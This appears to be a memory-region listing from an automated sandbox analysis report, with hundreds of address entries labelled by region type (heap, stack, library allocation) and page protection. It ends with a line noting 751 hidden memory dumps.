1FC90CA3000
heap
page read and write
4F5E1FE000
stack
page read and write
7FFAAC540000
trusted library allocation
page read and write
1FC962F0000
trusted library allocation
page read and write
1BD75CE8000
heap
page read and write
219DDBA1000
heap
page read and write
4F5E6BF000
stack
page read and write
217A601A000
heap
page read and write
219DDCC4000
heap
page read and write
7FFAAC710000
trusted library allocation
page read and write
B56D0BF000
stack
page read and write
93C15FD000
stack
page read and write
1E242C18000
heap
page read and write
7FFAAC740000
trusted library allocation
page read and write
1E242DD9000
heap
page read and write
7FFAAC6D0000
trusted library allocation
page read and write
1E242BAB000
heap
page read and write
1E242B51000
heap
page read and write
7FFAAC650000
trusted library allocation
page execute and read and write
1FC964EB000
heap
page read and write
7FFAACA21000
trusted library allocation
page read and write
1BD73C80000
heap
page read and write
1FC90D06000
heap
page read and write
219DDBC9000
heap
page read and write
1FC90CA1000
heap
page read and write
32ABBBF000
stack
page read and write
1E22A7CA000
trusted library allocation
page read and write
7FFAAC700000
trusted library allocation
page read and write
7FFB1E4D0000
unkown
page read and write
1BD73CA9000
heap
page read and write
7FFAAC670000
trusted library allocation
page execute and read and write
1E2289C0000
heap
page read and write
4F5E07D000
stack
page read and write
1FC96330000
remote allocation
page read and write
1E228A67000
heap
page read and write
1FC96461000
heap
page read and write
7FFAAC6E0000
trusted library allocation
page read and write
7FFB1E4D5000
unkown
page readonly
12F1C322000
heap
page read and write
7FFB1E4B1000
unkown
page execute read
1EC73BE0000
heap
page read and write
219DD9C0000
heap
page read and write
1FC90D02000
heap
page read and write
219E114D000
trusted library allocation
page read and write
217A6233000
heap
page read and write
7FFAAC6C0000
trusted library allocation
page read and write
7FFAACAA0000
trusted library allocation
page read and write
7FFAAC7C0000
trusted library allocation
page read and write
B56C8F2000
stack
page read and write
7FFAAC874000
trusted library allocation
page read and write
1FC91415000
heap
page read and write
4F5E7BE000
stack
page read and write
12F1C2F0000
heap
page read and write
1FC90C6F000
heap
page read and write
1E22A3F0000
trusted library allocation
page read and write
7DF422AE0000
trusted library allocation
page execute and read and write
1E23A6B1000
trusted library allocation
page read and write
1BD73CDE000
heap
page read and write
4F5E5BA000
stack
page read and write
217A6012000
heap
page read and write
7FFAAC494000
trusted library allocation
page read and write
1FC90CB7000
heap
page read and write
1E242D3C000
heap
page read and write
7FFAAC660000
trusted library allocation
page execute and read and write
7FFB1E4D0000
unkown
page read and write
19D57E10000
heap
page read and write
1BD75D6D000
heap
page read and write
1FC9642F000
heap
page read and write
1E23A6C0000
trusted library allocation
page read and write
4F5F20E000
stack
page read and write
7FFAAC6B0000
trusted library allocation
page read and write
7FFAAC530000
trusted library allocation
page read and write
1BD00062000
trusted library allocation
page read and write
217A65F0000
heap
page read and write
1FC90CB7000
heap
page read and write
1E2289E0000
heap
page read and write
4F5E83B000
stack
page read and write
19D57C50000
heap
page read and write
219DFAE1000
trusted library allocation
page read and write
1FC964C6000
heap
page read and write
32ABBFF000
stack
page read and write
7FFAACBD0000
trusted library allocation
page read and write
1FC90C91000
heap
page read and write
1E22A6F8000
trusted library allocation
page read and write
219F7DD0000
heap
page execute and read and write
7FFAAC990000
trusted library allocation
page execute and read and write
4F5E73E000
stack
page read and write
A351B7E000
stack
page read and write
1E23A71F000
trusted library allocation
page read and write
7FFAAC930000
trusted library allocation
page execute and read and write
7FFB1E4B1000
unkown
page execute read
7FFAACA2A000
trusted library allocation
page read and write
1BD75D03000
heap
page read and write
1E22B203000
trusted library allocation
page read and write
1E242B10000
heap
page execute and read and write
1FC90CB7000
heap
page read and write
7FFAAC490000
trusted library allocation
page read and write
19D580AE000
heap
page read and write
1E242D62000
heap
page read and write
217A623B000
heap
page read and write
217A6271000
heap
page read and write
2178F757000
trusted library allocation
page read and write
7FFB1E4D0000
unkown
page read and write
219DFB6D000
trusted library allocation
page read and write
219EFDD9000
trusted library allocation
page read and write
2AB23FE000
stack
page read and write
219DFAD0000
heap
page read and write
1FC90CB3000
heap
page read and write
2179DAE1000
trusted library allocation
page read and write
7FFAAC550000
trusted library allocation
page execute and read and write
219E1127000
trusted library allocation
page read and write
7FFAAC700000
trusted library allocation
page read and write
7FFAAC720000
trusted library allocation
page read and write
1BD75D93000
heap
page read and write
A351D7E000
stack
page read and write
7FFB1E4D0000
unkown
page read and write
7FFAACA52000
trusted library allocation
page read and write
7FFAAC873000
trusted library allocation
page execute and read and write
A351C7E000
stack
page read and write
B56CC7F000
stack
page read and write
1BD73C00000
heap
page read and write
7FFAAC493000
trusted library allocation
page execute and read and write
32ABE7E000
stack
page read and write
1FC91700000
trusted library allocation
page read and write
1DD6AB10000
heap
page read and write
B56DC8E000
stack
page read and write
7FFB1E4D5000
unkown
page readonly
1DD69170000
heap
page read and write
7FFAAC770000
trusted library allocation
page read and write
93C13FF000
stack
page read and write
4F5DD7E000
stack
page read and write
7FFAAC700000
trusted library allocation
page read and write
1FC96192000
trusted library allocation
page read and write
1FC961C0000
trusted library allocation
page read and write
2AB1FFF000
stack
page read and write
219DF990000
trusted library allocation
page read and write
49B507D000
stack
page read and write
7FFAAC672000
trusted library allocation
page read and write
1BD73CE3000
heap
page read and write
7FFAAC4B0000
trusted library allocation
page read and write
A351CFF000
stack
page read and write
4F5E2FF000
stack
page read and write
4F5DDFE000
stack
page read and write
7FFAAC4A0000
trusted library allocation
page read and write
2179DB56000
trusted library allocation
page read and write
1FC90D29000
heap
page read and write
219F7C2D000
heap
page read and write
219DDB20000
heap
page read and write
2178F1B3000
trusted library allocation
page read and write
19D57D30000
heap
page read and write
7FFAAC750000
trusted library allocation
page read and write
219E1928000
trusted library allocation
page read and write
7FFAAC630000
trusted library allocation
page read and write
219DDC11000
heap
page read and write
1FC90BE0000
heap
page read and write
1E242D34000
heap
page read and write
2178F547000
trusted library allocation
page read and write
219EFC93000
trusted library allocation
page read and write
7FFAAC740000
trusted library allocation
page read and write
219DDBD3000
heap
page read and write
1E228A5E000
heap
page read and write
217A5F96000
heap
page execute and read and write
2178F1D7000
trusted library allocation
page read and write
1E22A7CD000
trusted library allocation
page read and write
1FC96260000
trusted library allocation
page read and write
4F5E37D000
stack
page read and write
1DD68F40000
heap
page read and write
1FC96484000
heap
page read and write
49B3677000
stack
page read and write
2178C10D000
heap
page read and write
32AC47B000
stack
page read and write
1E242DA7000
heap
page read and write
7FFAAC566000
trusted library allocation
page execute and read and write
7FFAAC546000
trusted library allocation
page read and write
7FFAAC750000
trusted library allocation
page read and write
1E228AAB000
heap
page read and write
1FC96503000
heap
page read and write
1EC73B90000
heap
page read and write
7FFAAC49D000
trusted library allocation
page execute and read and write
1BD75650000
trusted library allocation
page read and write
1BD00111000
trusted library allocation
page read and write
B56CEF9000
stack
page read and write
7FFAAC790000
trusted library allocation
page read and write
1FC90C74000
heap
page read and write
1BD75EC0000
heap
page execute and read and write
1E242B16000
heap
page execute and read and write
1E242D20000
heap
page read and write
1FC962E0000
trusted library allocation
page read and write
7FFAAC7D0000
trusted library allocation
page read and write
A351A7D000
stack
page read and write
1E22B1EC000
trusted library allocation
page read and write
3D308FE000
stack
page read and write
219DDB59000
heap
page read and write
7FFAAC680000
trusted library allocation
page execute and read and write
2178F1D3000
trusted library allocation
page read and write
49B577E000
unkown
page readonly
49B417B000
stack
page read and write
1E22B227000
trusted library allocation
page read and write
217A5FA0000
heap
page read and write
7FFAACB20000
trusted library allocation
page read and write
7FFB1E4D0000
unkown
page read and write
219F7CC5000
heap
page read and write
217A6246000
heap
page read and write
7FFAAC576000
trusted library allocation
page execute and read and write
1BD10001000
trusted library allocation
page read and write
2178F331000
trusted library allocation
page read and write
1FC964C0000
heap
page read and write
A351BFE000
stack
page read and write
1BD00117000
trusted library allocation
page read and write
1FC961D0000
trusted library allocation
page read and write
1BD75670000
trusted library allocation
page read and write
7FFAACB80000
trusted library allocation
page read and write
2AB198A000
stack
page read and write
7FFAACA40000
trusted library allocation
page execute and read and write
1FC964F4000
heap
page read and write
217A6134000
heap
page read and write
7FFAAC6B0000
trusted library allocation
page read and write
1E242B20000
heap
page read and write
7FFAAC4A0000
trusted library allocation
page read and write
1BD73CEB000
heap
page read and write
7FFAACBB0000
trusted library allocation
page read and write
7FFAACAB0000
trusted library allocation
page read and write
1BD73C30000
heap
page read and write
1E22A7BF000
trusted library allocation
page read and write
7FFAAC641000
trusted library allocation
page read and write
2178F68E000
trusted library allocation
page read and write
219DDBCF000
heap
page read and write
3F19EFF000
unkown
page read and write
7FFAAC650000
trusted library allocation
page execute and read and write
1E242BDE000
heap
page read and write
B56C9FE000
stack
page read and write
7FFAAC770000
trusted library allocation
page read and write
93C0FFF000
stack
page read and write
1E228AA6000
heap
page read and write
1E242DDD000
heap
page read and write
1FC96180000
trusted library allocation
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
7FFAAC7B0000
trusted library allocation
page read and write
7FFB1E4D2000
unkown
page readonly
1FC9151A000
heap
page read and write
7FFAAC4DC000
trusted library allocation
page execute and read and write
1FC90C5B000
heap
page read and write
7FFAAC6F0000
trusted library allocation
page read and write
7FFAAC920000
trusted library allocation
page read and write
1E228A6D000
heap
page read and write
2AB24FF000
stack
page read and write
7FFAAC494000
trusted library allocation
page read and write
219DDC0B000
heap
page read and write
32ABAB3000
stack
page read and write
2178DA00000
heap
page execute and read and write
1E22A6A0000
heap
page execute and read and write
219F7F05000
heap
page read and write
1FC97000000
heap
page read and write
12F1DC60000
heap
page read and write
1BD00114000
trusted library allocation
page read and write
1E242D73000
heap
page read and write
1BD00044000
trusted library allocation
page read and write
7FFAAC770000
trusted library allocation
page read and write
1FC90CAF000
heap
page read and write
1FC961D4000
trusted library allocation
page read and write
7FFAAC4A0000
trusted library allocation
page read and write
7FFAACB40000
trusted library allocation
page read and write
1FC96700000
trusted library allocation
page read and write
B56CDFE000
stack
page read and write
2178C0FE000
heap
page read and write
219F7DE0000
heap
page read and write
2178D9A0000
heap
page read and write
1FC96191000
trusted library allocation
page read and write
7DF4D75D0000
trusted library allocation
page execute and read and write
7FFAAC5B0000
trusted library allocation
page execute and read and write
7FFAAC49B000
trusted library allocation
page read and write
7FFAAC6F0000
trusted library allocation
page read and write
1FC96400000
heap
page read and write
2178DB60000
trusted library allocation
page read and write
219DDB94000
heap
page read and write
1E242DE6000
heap
page read and write
1FC96260000
trusted library allocation
page read and write
1E242A60000
heap
page execute and read and write
32ACECE000
stack
page read and write
1E22AB6F000
trusted library allocation
page read and write
1E242BB9000
heap
page read and write
7FFB1E4B1000
unkown
page execute read
217A6038000
heap
page read and write
7FFAACB30000
trusted library allocation
page read and write
1DD68F47000
heap
page read and write
1BD75D4F000
heap
page read and write
7FFAACB90000
trusted library allocation
page read and write
7FFAAC8CC000
trusted library allocation
page execute and read and write
7FFAAC680000
trusted library allocation
page read and write
7FFAAC740000
trusted library allocation
page read and write
2178C0C9000
heap
page read and write
1FC90C13000
heap
page read and write
1BD75EE0000
heap
page read and write
7FFAACBC0000
trusted library allocation
page read and write
2178DA40000
trusted library allocation
page read and write
7FFAACB70000
trusted library allocation
page read and write
7FFAAC690000
trusted library allocation
page read and write
7FFAAC7A0000
trusted library allocation
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
1E228A7F000
heap
page read and write
1BD75F29000
heap
page read and write
2178DA43000
trusted library allocation
page read and write
A351EFE000
stack
page read and write
2178DAD5000
heap
page read and write
7FFAAC632000
trusted library allocation
page read and write
1FC96190000
trusted library allocation
page read and write
2AB1DFE000
stack
page read and write
219E112D000
trusted library allocation
page read and write
7FFAAC482000
trusted library allocation
page read and write
219DDBE3000
heap
page read and write
1E22B1F0000
trusted library allocation
page read and write
1EC73F00000
heap
page read and write
1EC73B80000
heap
page read and write
2178C090000
trusted library allocation
page read and write
7FFB1E4C6000
unkown
page readonly
1FC90CFF000
heap
page read and write
93C12FE000
stack
page read and write
3D30FFF000
stack
page read and write
7FFAACA70000
trusted library allocation
page read and write
2178C11F000
heap
page read and write
1FC964F9000
heap
page read and write
A35178E000
stack
page read and write
7FFAAC7A0000
trusted library allocation
page read and write
1BD10011000
trusted library allocation
page read and write
1FC9151A000
heap
page read and write
7FFAAC49D000
trusted library allocation
page execute and read and write
1DD68EB0000
heap
page read and write
217A6130000
heap
page read and write
1FC90C40000
heap
page read and write
A351AFE000
stack
page read and write
1FC91500000
heap
page read and write
219EFAF0000
trusted library allocation
page read and write
32ABFFE000
stack
page read and write
3D310FB000
stack
page read and write
7FFAACAC0000
trusted library allocation
page read and write
12F1C310000
heap
page read and write
1E22A70E000
trusted library allocation
page read and write
219DF953000
trusted library allocation
page read and write
2178C005000
heap
page read and write
7FFAAC720000
trusted library allocation
page read and write
2178C0B0000
trusted library allocation
page read and write
7FFAAC72A000
trusted library allocation
page read and write
7FFAAC7F0000
trusted library allocation
page read and write
1BD73D25000
heap
page read and write
217A5F30000
heap
page execute and read and write
219E1192000
trusted library allocation
page read and write
7FFAAC54C000
trusted library allocation
page execute and read and write
7FFAAC6D8000
trusted library allocation
page read and write
7FFB1E4B0000
unkown
page readonly
1FC961E9000
trusted library allocation
page read and write
1BD75686000
heap
page read and write
219F7BF0000
heap
page read and write
B56CE7E000
stack
page read and write
217A6076000
heap
page read and write
7FFAAC7D0000
trusted library allocation
page read and write
A352ACF000
stack
page read and write
1BD00154000
trusted library allocation
page read and write
2178BFE0000
heap
page read and write
1FC90C96000
heap
page read and write
2178D960000
heap
page readonly
7FFAAC790000
trusted library allocation
page read and write
49B3C7E000
unkown
page readonly
7FFAAC540000
trusted library allocation
page execute and read and write
49B3A7E000
unkown
page readonly
7FFAAC730000
trusted library allocation
page read and write
1BD00048000
trusted library allocation
page read and write
1BD00040000
trusted library allocation
page read and write
219DFA00000
heap
page execute and read and write
A351FFE000
stack
page read and write
2178F1AE000
trusted library allocation
page read and write
B56C97F000
stack
page read and write
93C10FF000
stack
page read and write
2AB20FF000
stack
page read and write
7FFAAC630000
trusted library allocation
page read and write
1BD0007F000
trusted library allocation
page read and write
1E22A3A0000
heap
page read and write
1FC91402000
heap
page read and write
7FFAACA80000
trusted library allocation
page read and write
7FFAAC780000
trusted library allocation
page read and write
7FFAAC48D000
trusted library allocation
page execute and read and write
7FFAAC750000
trusted library allocation
page read and write
219DDCC0000
heap
page read and write
7FFAAC7F0000
trusted library allocation
page read and write
219DFD15000
trusted library allocation
page read and write
A35170E000
stack
page read and write
2AB1CFE000
stack
page read and write
1BD73CE9000
heap
page read and write
2179DC99000
trusted library allocation
page read and write
7FFAAC6C0000
trusted library allocation
page read and write
1E242D85000
heap
page read and write
93C0EFA000
stack
page read and write
4F5E3F8000
stack
page read and write
7FFAAC780000
trusted library allocation
page read and write
1BD1006B000
trusted library allocation
page read and write
7FFAAC622000
trusted library allocation
page read and write
32AC2FE000
stack
page read and write
49B30BB000
stack
page read and write
2178F0D8000
trusted library allocation
page read and write
2178C107000
heap
page read and write
1FC96280000
trusted library allocation
page read and write
217A5F90000
heap
page execute and read and write
49B56FE000
stack
page read and write
1BD73C50000
heap
page read and write
219DF950000
trusted library allocation
page read and write
7FFAACB10000
trusted library allocation
page read and write
4F5F28D000
stack
page read and write
1FC964E5000
heap
page read and write
7FFAAC780000
trusted library allocation
page read and write
1BD00089000
trusted library allocation
page read and write
7FFAAC6E0000
trusted library allocation
page read and write
2178BF00000
heap
page read and write
219DDBC3000
heap
page read and write
1E22AC1F000
trusted library allocation
page read and write
49B427E000
unkown
page readonly
219DDAA0000
heap
page read and write
219EFAE1000
trusted library allocation
page read and write
219E1115000
trusted library allocation
page read and write
1FC96280000
trusted library allocation
page read and write
7FFAAC64A000
trusted library allocation
page read and write
1FC90D13000
heap
page read and write
1FC9644F000
heap
page read and write
3D30AFF000
stack
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
B56D2BB000
stack
page read and write
7FFAACAD0000
trusted library allocation
page read and write
1E22A6F0000
trusted library allocation
page read and write
217A6289000
heap
page read and write
1BD75610000
trusted library section
page read and write
7FFAAC92C000
trusted library allocation
page execute and read and write
219DDCC6000
heap
page read and write
3D30DFE000
stack
page read and write
217A6080000
heap
page read and write
B56CCFD000
stack
page read and write
7FFAAC680000
trusted library allocation
page execute and read and write
1FC90CAF000
heap
page read and write
A351E7D000
stack
page read and write
7FFAAC662000
trusted library allocation
page read and write
1BD75DE0000
heap
page read and write
32AC0FF000
stack
page read and write
2178C145000
heap
page read and write
1FC96110000
trusted library allocation
page read and write
7FFAACB50000
trusted library allocation
page read and write
1FC96442000
heap
page read and write
B56CD7E000
stack
page read and write
7FFAAC7E0000
trusted library allocation
page read and write
7FFAACB60000
trusted library allocation
page read and write
219F7CB1000
heap
page read and write
219E0715000
trusted library allocation
page read and write
1DD68DD0000
heap
page read and write
1E22A7D1000
trusted library allocation
page read and write
32ABEFD000
stack
page read and write
1BD73CFF000
heap
page read and write
1BD75780000
heap
page execute and read and write
1BD75680000
heap
page read and write
1BD75660000
heap
page readonly
93C17FE000
stack
page read and write
1FC90CAA000
heap
page read and write
4F5E27F000
stack
page read and write
1BD73D27000
heap
page read and write
1FC91340000
trusted library allocation
page read and write
32AC07E000
stack
page read and write
7FFAAC690000
trusted library allocation
page read and write
7FFAACA90000
trusted library allocation
page read and write
2178D970000
trusted library allocation
page read and write
1FC90C78000
heap
page read and write
1FC961B0000
trusted library allocation
page read and write
7FFAAC63A000
trusted library allocation
page read and write
7FFAAC790000
trusted library allocation
page read and write
219F7C73000
heap
page read and write
1E22A6B1000
trusted library allocation
page read and write
4F5E539000
stack
page read and write
49B397E000
stack
page read and write
7FFB1E4B0000
unkown
page readonly
B56D03D000
stack
page read and write
7FFAAC690000
trusted library allocation
page read and write
12F1C319000
heap
page read and write
7FFAAC493000
trusted library allocation
page execute and read and write
7FFAACBA0000
trusted library allocation
page read and write
7FFAAC872000
trusted library allocation
page read and write
1FC964BE000
heap
page read and write
1E22A510000
heap
page read and write
7FFAAC760000
trusted library allocation
page read and write
7FFB1E4D5000
unkown
page readonly
1FC96770000
trusted library allocation
page read and write
7FFAACB00000
trusted library allocation
page read and write
1FC90BD0000
heap
page read and write
1EC73BE8000
heap
page read and write
B56D1B8000
stack
page read and write
3F19E79000
stack
page read and write
7FFAAC54C000
trusted library allocation
page execute and read and write
4F5DCF5000
stack
page read and write
93C16FE000
stack
page read and write
4F5E43E000
stack
page read and write
4F5E0FE000
stack
page read and write
1FC91400000
heap
page read and write
219DDB00000
heap
page read and write
7FFAAC880000
trusted library allocation
page read and write
1FC90C00000
heap
page read and write
7FFAAC6C0000
trusted library allocation
page read and write
7FFAAC760000
trusted library allocation
page read and write
1FC90BB0000
heap
page read and write
1E2289F0000
heap
page read and write
19D580A0000
heap
page read and write
1E228A29000
heap
page read and write
7FFAAC540000
trusted library allocation
page read and write
32AC1FE000
stack
page read and write
1BD75740000
heap
page execute and read and write
1BD75F3D000
heap
page read and write
1FC90C97000
heap
page read and write
7FFAAC4EC000
trusted library allocation
page execute and read and write
1BD0011E000
trusted library allocation
page read and write
49B517E000
unkown
page readonly
7FFAAC660000
trusted library allocation
page execute and read and write
7FFAAC64A000
trusted library allocation
page read and write
There are 751 hidden memdumps, click here to show them.